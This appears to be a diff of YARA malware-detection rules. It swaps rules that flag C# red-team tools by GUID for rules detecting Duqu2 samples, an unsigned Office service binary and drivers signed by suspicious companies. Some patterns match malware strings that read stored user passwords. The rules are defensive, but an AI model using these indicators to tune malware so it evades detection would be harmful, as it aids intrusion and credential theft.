+		hash4 = "5559fcc93eef38a1c22db66a3e0f9e9f026c99e741cc8b1a4980d166f2696188"
 
 	strings:
-		$typelibguid0lo = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii wide
-		$typelibguid0up = "5FD7F9FC-0618-4DDE-A6A0-9FAEFE96C8A1" ascii wide
+		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
+		$s2 = "MSI.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Bantam : FILE
+rule SIGNATURE_BASE_Duqu2_Sample2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0ed3f5e5-d954-51e2-b7fb-4c25ca3d9f10"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/gellin/bantam"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L974-L988"
+		description = "Detects Duqu2 Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a32f54a3-8656-5592-ac40-17330bfca319"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L30-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1d0749746dc3a109b592165616f829d01cfb4be8e16137548be8a85c40d6eb7"
-		score = 75
+		logic_hash = "6afd87d472929f56272eb6f28970f2c8be5eb08e6126287391aee1269de1100d"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d12cd9490fd75e192ea053a05e869ed2f3f9748bf1563e6e496e7153fb4e6c98"
+		hash2 = "5ba187106567e8d036edd5ddb6763f89774c158d2a571e15d76572d8604c22a0"
+		hash3 = "6e09e1a4f56ea736ff21ad5e188845615b57e1a5168f4bdaebe7ddc634912de9"
+		hash4 = "c16410c49dc40a371be22773f420b7dd3cfd4d8205cf39909ad9a6f26f55718e"
+		hash5 = "2ecb26021d21fcef3d8bba63de0c888499110a2b78e4caa6fa07a2b27d87f71b"
+		hash6 = "2c9c3ddd4d93e687eb095444cef7668b21636b364bff55de953bdd1df40071da"
 
 	strings:
-		$typelibguid0lo = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii wide
-		$typelibguid0up = "14C79BDA-2CE6-424D-BD49-4F8D68630B7B" ascii wide
+		$s1 = "=<=Q=W=a=g=p=v=|=" fullword ascii
+		$s2 = ">#>(>.>3>=>]>d>p>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptask : FILE
+rule SIGNATURE_BASE_Duqu2_Sample3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2cdd1a15-c70c-5eea-b5a7-8b4a445b9323"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/jnqpblc/SharpTask"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L990-L1004"
+		description = "Detects Duqu2 Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c558445f-fbe3-57db-80f7-09a87b097921"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c6fae49accf763101ce0afc6c1ffd07740fbc68105f99059fac4f7ba0c8846c"
-		score = 75
+		logic_hash = "4adaf71a4acd8ce122af0b6f1267dc34c5190efcb4a6fa3322c1e6cf67a546a5"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69"
 
 	strings:
-		$typelibguid0lo = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii wide
-		$typelibguid0up = "13E90A4D-BF7A-4D5A-9979-8B113E3166BE" ascii wide
+		$s1 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1 )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsplague : FILE
+rule SIGNATURE_BASE_Duqu2_Sample4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "89729c43-ae01-5c1f-af04-06d7a6c4e7fc"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/RITRedteam/WindowsPlague"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1006-L1020"
+		description = "Detects Duqu2 Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8c5ca68d-762c-5d2e-8d37-f58dc66bcae2"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L68-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c8ce2b52a4ebab5b9693d957c43cf1c340160f4bdd05d3cb95af496e7168d83"
-		score = 75
+		logic_hash = "ddecd1d7fa007b83fe6e29ac8983d02511a89a16ab2365f8086ec92a52d4bf33"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3536df7379660d931256b3cf49be810c0d931c3957c464d75e4cba78ba3b92e3"
 
 	strings:
-		$typelibguid0lo = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii wide
-		$typelibguid0up = "CDF8B024-70C9-413A-ADE3-846A43845E99" ascii wide
+		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
+		$s2 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
+		$s3 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
+		$s4 = "ProcessUserAccounts" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Misc_Csharp : FILE
+rule SIGNATURE_BASE_Duqu2_Uas : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d25fa706-2254-5a82-a961-f57a0daa447c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/jnqpblc/Misc-CSharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1022-L1038"
+		description = "Detects Duqu2 Executable based on the specific UAs in the file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d82f6351-fab0-5324-850f-dd40a172fceb"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L86-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "446cf6773e679b18da31f63b52cdc6918e77ce5496848864c973ca5af60cdb05"
-		score = 75
+		logic_hash = "8bf27ca851c580080514dfa886c0d7c69ac114efb5dbc35ccd1e7686c3dd44b1"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "52fe506928b0262f10de31e783af8540b6a0b232b15749d647847488acd0e17a"
+		hash2 = "81cdbe905392155a1ba8b687a02e65d611b60aac938e470a76ef518e8cffd74d"
 
 	strings:
-		$typelibguid0lo = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii wide
-		$typelibguid0up = "D1421BA3-C60B-42A0-98F9-92BA4E653F3D" ascii wide
-		$typelibguid1lo = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii wide
-		$typelibguid1up = "2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1" ascii wide
+		$x1 = "Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1" fullword wide
+		$x2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7xs5D9rRDFpg2g" fullword wide
+		$x3 = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)" fullword wide
+		$x4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpspray : FILE
+
+rule SIGNATURE_BASE_SUSP_Unsigned_OSPPSVC : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e9312c96-be10-5942-a4da-1fe708cc6699"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/jnqpblc/SharpSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1040-L1054"
+		description = "Detects a suspicious unsigned office software protection platform service binary"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0e312237-0c82-59da-b62d-56065c6075f0"
+		date = "2019-09-26"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sign_anomalies.yar#L4-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d2b757ccfaa924764b3c1869908e730022641e5c78919226370e84e84d6546ae"
-		score = 75
+		logic_hash = "27d8d8d19e25a2e3cffb765a0b3122e38dcb72d60c00c554163ee193a04b3d82"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5294a730f1f0a176583b9ca2b988b3f5ec65dad8c6ebe556b5135566f2c16a56"
 
 	strings:
-		$typelibguid0lo = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii wide
-		$typelibguid0up = "51C6E016-1428-441D-82E9-BB0EB599BBC8" ascii wide
+		$sc1 = { 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63
+               00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00
+               00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+               00 66 00 74 00 20 00 4F 00 66 00 66 00 69 00 63
+               00 65 00 20 00 53 00 6F 00 66 00 74 00 77 00 61
+               00 72 00 65 00 20 00 50 00 72 00 6F 00 74 00 65
+               00 63 00 74 00 69 00 6F 00 6E 00 20 00 50 00 6C
+               00 61 00 74 00 66 00 6F 00 72 00 6D 00 20 00 53
+               00 65 00 72 00 76 00 69 00 63 00 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and $sc1 and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Obfuscator : FILE
+rule SIGNATURE_BASE_SUSP_PE_Signed_By_Suspicious_Entitiy_Mar23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
+		description = "Find driver signed by suspicious company (see references)"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d9988b00-1f10-5421-8ffe-49849a5d5902"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/3xpl01tc0d3r/Obfuscator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1056-L1070"
+		id = "13151f9b-22cb-551f-81b4-a60a301f0bfc"
+		date = "2023-03-06"
+		modified = "2023-12-05"
+		reference = "https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sign_anomalies.yar#L28-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e56ec4a13dedbf987bf6f8ee1a8dcce31b82348053d541d836086a9923f3b934"
-		score = 75
+		hash = "2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b"
+		hash = "9a24befcc0c0926abb49d43174fe25c2469cca06d6ab3b5000d7c9d434c42fe9"
+		hash = "9ad716f0173489e74fefe086000dfbea9dc093b1c3460bed9cdb82f923073806"
+		hash = "a007c8c6c1aecfff1065429fef691e7ae1c0ce20012a113f01ac57c61564a627"
+		hash = "fbe82a21939d04735aa3bbf23fbabd45ac491a143396e8e62ee20509c1257918"
+		hash = "d12c6ea0a86c58ea2d80d1dc9b793ba28a0db92c72bb5b6f4ee2b800fe42091b"
+		hash = "4cf31d000f1542690cbc0ace41e4166651a71747978dc408e3cce32e82713917"
+		hash = "e1adaea335b20d4d2e351f7bea496cd40cb379376900434866db342f851d9ddf"
+		hash = "031408cf2f2c282bcc05066356fcc2bb862b7e3c504ab7ffb0220bea341404a5"
+		hash = "2f13d4e1bd35f6c0ad0978af19006c17193cf3d42b71cba763cca68f7e9d7fca"
+		hash = "cb40a5dc4f6a27b1dc50176770026b827f8baa05fa95a98a4e880652f6729d96"
+		hash = "a7591b7384bd10eb934f0dac8dcbfdff8c352eba2309f4d75553567fa2376efa"
+		hash = "d517ce5f132b3274f0b9783a5b0c37d1d648e6079874960af24ca764b011c042"
+		hash = "aeec903013d5b66f0ae1c6fa50bb892759149c1cec86db8089a4e60482e02250"
+		hash = "0d22828724cb7fbc6cef7f98665d020867d2eb801cff2c21f2e97e481040499b"
+		hash = "4b2e874d51d332fd840dadd463a393f9f019de46e49de73be910b9b1365e4e4e"
+		hash = "3839c0925acf836238ba9a0c5798b84b1c089a8353cc27ae7e6b75d273b539e3"
+		hash = "c470f519fb0d4a2862035e0d9e105a0a6918adc51842b12ad14b5b5f34879963"
+		hash = "cc6d174bc86f84f5a4c516e9c04947e2fecc0509a84748ea80576aeee5950aed"
+		hash = "6fe8df70254f9b5f53452815f0163cb2ffb2d7f0f5aefbb9b149ad1be9284e31"
+		hash = "4cde473fb68fa9b2709ea8a23349cd2fce8b8b3991b9fea12f95d12292b8aa7a"
+		hash = "e2c40c8dd60bb395807c39c76bfdf5cd158ebefd2a47ad3306a96662c50057c0"
+		hash = "9c12b09b529fa517eaeb49df22527d7563b5432d62776166048d97f83b2dce5c"
+		hash = "5a4e17287f3dceb5bf1ed411e5fdd7e8692aebf2a19b334327733fc1c158b0ba"
+		hash = "c42964aa7fa354b1a285bdbcbd9e84b6bdd8813ff9361955e0e455d032803cce"
+		hash = "ffd6955bf40957a35901d82fd5b96d0cb191b651d3eca7afa779eebfed0d9f7e"
+		hash = "f6874335eb0d611d47b2ec99a6b70f7b373a50d8d1f62d290b06174f42279f36"
+		hash = "4e6d7fd70a143f19429fead2c14779aea9d9140e270bb9e91e47fa601643e40e"
+		hash = "7b0e4aae37660b1099de69f4c14f5d976f260c64a4af8495ff1415512a6268ba"
+		hash = "db45cbfb094f3e1ebf1cb3880087a24d4e771cc43ba48ad373e6283cbe7391da"
+		hash = "813edc804f59a97ec9391ea0db4b779443bd8daf1e64c622b5e3c9a22ee9c2e0"
+		hash = "8d66a4b7c2ae468390d32e5e70b3f9b7cb796b54b7c404cde038de9786be8d1d"
+		hash = "85936141f0f32cf8f3173655e7200236d1fce6ef9c2616fd2b19ae7951c644c5"
+		hash = "b5fc0cc9980fc594a18682d2b0d5b0d0f19ba7a35d35106693a78f4aaba346ac"
+		hash = "7aae36c5ffa8baaab19724dae051673ddafd36107cb61c505926bfceaadcd516"
+		hash = "5d0228a0d321e2ddac5502da04ca7a2b2744f3dc1382daa5f02faa9da5aface1"
+		hash = "2af1ac8bc8ae8d7cad703d2695f2f6c6d79b82eebba01253a8ec527e11e83fcd"
+		hash = "c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497"
+		hash = "0e339c9c8a6702b32ee9f2915512cbeb3391ced74b16c7e0aed9b1a80c9e58c8"
+		hash = "80bdeaa4f162c65722b700e4ffba31701d0d634f5533e59bf3885dc67ee92f3f"
+		hash = "4570f64f2000bdaf53aec0fc2214c8bd54e0f5cb75987cdf1f8bda6ea5fc4c43"
+		hash = "a9c906bde6c8a693d5d46c9922dafa2dfd2dec0fff554f3f6a953c2e36d3f7b7"
+		hash = "520df3ddd7c9ecdeecac8e443d75ac258c26b45d37ecec22501afdda797f6a0a"
+		hash = "4d3e0f27a7bcfd4b442b489c63641af22285ca41c6d56ac1db734196ab10b315"
+		hash = "5000b3b1d593ba40cc10098644af1551259590ac67d3726fab2be87aad460877"
+		hash = "7c27bd6104fc67dd16e655f3bf67c2abd8b5bf2a693ba714ac86904c5765b316"
+		hash = "34b1234eab7ff10edde9e09ecf73c5e4bfe9ee047ccfdb43de1e1f6155afad0c"
+		hash = "f6fe2cc9ea31f85273c26e84422137df21cfce4b9e972b0db94fe3a67b54f6ca"
+		hash = "ec4d0828196926bd36325f4b021895d37cfaaa024f754b36618c78b2574f0122"
+		hash = "2a89f263d85da8fb0c934d287b5b524744479741491c740aaa46ac9f694f6d1b"
+		hash = "c8d0122974fc10a7d82c62f3e6573a94379c026dd741fd73497afdf36d3929be"
+		hash = "0345f71876bc4c888deadba7284565a8da112901f343e54b8522279968abd1b2"
+		hash = "6c0e10650be9e795dc6adfbe8aad8c1c3a8657e4c45cb82a7d5188ee24021ca0"
+		hash = "90b8d9c4ff3e4e0a0342e0d91da3a25be2fead29f3b32888bb35f8575845259d"
+		hash = "0310400c9e62c3fe08dc6506313e26f7c5c89035c81b0141ce57543910c1c42e"
+		hash = "b0da0316443f878aad0b3d9764b631d5df60e119ab59324c37640da1b431893a"
+		hash = "cc4bd06f27a5f266bc8825a08e5f45dcaa4352eb6d69214b5037d28cc8de6908"
+		hash = "2d4b7c6931203923db9a07e1ac92124e799f3747ab20e95e191e99c7b98f3fbd"
+		hash = "b5965de0d883fd0602037f3dc26fd4461e6328612f1a34798cff0066142e13c4"
+		hash = "86ce17183ddf32379db53ecaedefe0811252165b05cd326025bb8eca2e6a25d7"
+		hash = "6edca16d5aa751aa4c212e6477121d51e4d9b9432896d25b41938a27a554bbe7"
+		hash = "cdd8966e0cf08a6578e34de7498a44413a6adabae04d81ef3129f26305966db2"
+		hash = "df890974589ed2435f53b8c8f147a06752f1b37404afd4431362c1938fcb451e"
+		hash = "3e05d8abaaa95af359e5b09efb30546d0aa693859ebc8a0970a2641556ea644c"
+		hash = "1c8ddf4b9c99c8f1945abf1527c7fa93141430680ac156a405d9a927d32f3b5e"
+		hash = "5d2ed5930ab1a650f9fb9293f49a9f35737139fdfa9f14e46a07e5d4d721ae3e"
+		hash = "18834de3e4844a418970c2184cc78c2d7cb61d18e9f7c7c0e88e994b4212edc5"
+		hash = "a6b6fc94d8e582059af0fe30c2c93c687fccd5a0073a6a26a2cd097ea96adc7c"
+		hash = "28b40fa160c915f13f046d36725c055d6c827a4d28674ea33c75a9b410321290"
+		hash = "efab0fbf77dc67a792efd1fe2b3f46bbdfdee30a9321acc189c53a6c5e90f05c"
+		hash = "348781221d1a2886923de089d1b7b12c32cfdd38628b71203da925b5736561e9"
+		hash = "a1a5f410e6eab2445d64bfcd742fe1a802a0a2d9af45c7ab398f84894dd5dc3d"
+		hash = "9de05ce0d9e9de05ebdc2859a5156f044f98bb180723f427a779d36b1913e5d3"
+		hash = "eeff7e85c50a7f11fc8a99f7048953719fb1d2a6451161a0796eac43119ece21"
+		hash = "383cc025800a3b3d089f7697e78fe4d5695a8d1ee26dcad0b0956ad6800ccae4"
+		hash = "41be6f393cea4d8d5869fff526c4d75ec66c855f7e9c176042c39b9682ea9c14"
+		hash = "71552e65433c8bbf14e5bcbc35a708bc10d6fded740c5f4783edce84aea4aabf"
+		hash = "3c1b3e8666b58a78c70f36ed557c7ecc52e84457e87e5884b42e5cd9e8c1a303"
+		hash = "4288d7113031151a2636a164c0dc6fce78c86f322271afec9ef2d4b54494c334"
+		hash = "f73a39332be393a9bc23ec27ff6d025bc90d7320dde97f37cc585ecf6c0436a2"
+		hash = "018f5103635992aa9ddc1c46cafe2b7ba659fcfbc8f8ab29dcea28e155b033ee"
+		hash = "fe650fc138dcfbbd4ab6aa5718bf3cd36f50898ae19d3aceaa12f7d4f39d0b43"
+		hash = "fa21b39cd5a24ba35433e90cae486454b7400b50e7f7f5c190fdbec6704b4352"
+		hash = "3dd36c798cc89bfad7cdbf58d7da90ba113fe043ca46bdbcab7ae7fb9dc2f42b"
+		hash = "674f4444f0de5c81c766c376a65fbdf1f7116228a61c71ffb504995c9e160183"
+		hash = "cd3d25b2842bb2d6a5580f72e819acd344ce7f3a2478fb6d53ff668ad6531228"
+		hash = "1668f4eb8a85914db46ff308b9f8a5040a024acc93259dfc004ea2b80ab6bcf1"
+		hash = "4f31cab6c011b79bf862bb6acea3086308b0576afe33affdb09039c97e723beb"
+		hash = "6b0ff48b8113076d2875edb7bea7f120b7b9d9a990ae296a5b5a95660ae7edfc"
+		hash = "956a00dd6382e83d3f7490378ae98e4fc8d9b8ec2cd549519f007091e3ccce1f"
+		hash = "8c7f938cf55728d8d41a7fa6b9953c4f81cf05ed3d7b7435ec8999e130257f7f"
+		hash = "427ee4d4d18fc0c1196326215e94947f7d8c03794de36d0127231690bf5bf3c0"
+		hash = "b6f3ece5bf7b9f6ecf99104d3c76b9007106fad98d20500956dd1e42d4ec5e8d"
+		hash = "47a0ad6150c5a1de4c788827662a9cafbd2816a7d32be2028721e49a464acbed"
+		hash = "8743ac81384fd10c0459f3574489d626e13c95dd73274dcf1d872bcd3630b9e8"
+		hash = "a1755415a12f85bea3f65807860f902cf41e56b0ab2c155ac742af3166ef1dfd"
+		hash = "3f5a91500bfade2d9708e1fbe76ae81dacdb7b0f65f335fee598546ccfc267e3"
+		hash = "5be43b773dbde6542d6a0d53cd6616ea95a49dd38659edc6ba0d580a0d9777ab"
+		hash = "90e080a63916c768b0b65787fe5695fd903d44e1b0b688d06c14988ba30b5ea7"
+		hash = "d1184ee3f26919b8f5a4b1a6d089f14e79e0c89260590156111f72a979c8e446"
+		hash = "c13ddd2bafcfdfc00fb5cb87d8eb533ae094b0dd5784df77c98bddeac9d72725"
+		hash = "9bb3035610bd09ba769c0335f23f98dd85c2f32351cdd907d4761b41ab5d099c"
+		hash = "1703025c4aed71d0ca29a3cd0e15047c24cc9adbb5239765f63e205ef7d65753"
+		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
+		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
+		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
+		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
+		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
+		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
+		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
+		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
+		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
+		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
+		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
+		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
+		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
+		hash = "5654ed1205de6860e66383a27231e4ac2bb7639b07504121d313a8503ece3305"
+		hash = "5d1e3c495d08982459b4bd4fd2ab073ed2078fce9347627718a7c25adee152e9"
+		hash = "458702ae1b2ef8a113344be76af185ee137b7aac3646ece626d2eeeadcc9e003"
+		hash = "2c703e562a6266175379fa48f06f58aab109dbe56e0cde24b4b0db5f22f810a3"
+		hash = "49faf70c0978c21a68bc8395cf326f50c491e379f55b5df7d17f0af953861ece"
+		hash = "a2b16bbef0a7cb545597828466cd13225efaba6e7006bfbf59040bbff54c463c"
+		hash = "b08449d42f140c7e4d070c5f81ce7509f48282a5bb0e06948b7ed65053696a37"
+		hash = "c1633ad8c9e6c2b4cc23578655fc6cf5cd0122cfd24395d1551af1d092f89db2"
+		hash = "01f42f949a37d9d479b8021f27dcf0d0e6f0b0b6cd2e0883c6b4b494f0a1d32a"
+		hash = "4943d53a38ac123ed7c04ad44742a67ea06bb54ea02fa241d9c4ebadab4cb99a"
+		hash = "597ce12c9fbecc71299ba6fc3e4df36cc49222878d0e080c4c35bbfdffd30083"
+		hash = "0265fbd9cfc27c26c42374fce7cf0ef11f38e086308d51648b45f040d767c51d"
+		hash = "0dc92a1a6fd27144b3e35a9900038653892d25c2db8ede8b9e0aee04839f165a"
+		hash = "682582c324cb1eafacf80090f6108c1580fee12dbfdfe8b51771d429fdcce718"
+		hash = "e9e6f6e22b5924f80164fbad45be28299e9ec0bd2f404551b6ca772509a7135a"
+		hash = "a8db750f82906fb9cf9fb371ec65be76275d9b81b95e351fcb3db4ef345884ab"
+		hash = "e900b4016177259d07011139a55c0571c1e824fb7e9dddc11df493b3c8209173"
+		hash = "f8a7a26d51a5e938325deee86cbf5aa8263d3a50818c15d5a395b98658630c18"
+		hash = "861b87fc6c4758cfe1e26c7a038cffb64054ad633b7ea81319c9a98b7b49df0d"
+		hash = "848fdb491307ed7b002dbdf99796df2b286d53b2e0066d78f3554f2f38a2c438"
+		hash = "4b0c05bc33c9e7d0ed2d97dbefb6292469b9d74d650d5cfb2691345a11c0f54a"
+		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
+		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
+		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
+		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
+		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
+		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
+		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
+		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
+		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
+		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
+		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
+		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
